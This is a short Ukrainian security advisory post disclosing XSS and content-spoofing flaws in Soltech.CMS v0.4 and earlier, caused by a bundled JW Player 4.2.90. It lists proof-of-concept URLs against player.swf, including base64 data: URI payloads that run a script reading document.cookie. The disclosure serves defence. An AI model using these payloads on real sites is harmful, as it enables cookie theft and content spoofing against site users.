XSS та CS уразливості в Soltech.CMS
23:58 27.08.201313.07.2013
У травні, 26.05.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в Soltech.CMS. Про що найближчим часом повідомлю розробникам системи.
Раніше я вже писав про уразливість в Soltech.CMS.
Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам.
27.08.2013
В системі використовується вразлива версія JW Player 4.2.90.
Cross-Site Scripting (WASC-08):
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/plugins/flashplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg
Content Spoofing (WASC-12):
http://site/plugins/flashplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/plugins/flashplayer/player.swf?file=1.flv&image=1.jpg
http://site/plugins/flashplayer/player.swf?config=1.xml
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua
Вразливі Soltech.CMS v 0.4 та попередні версії.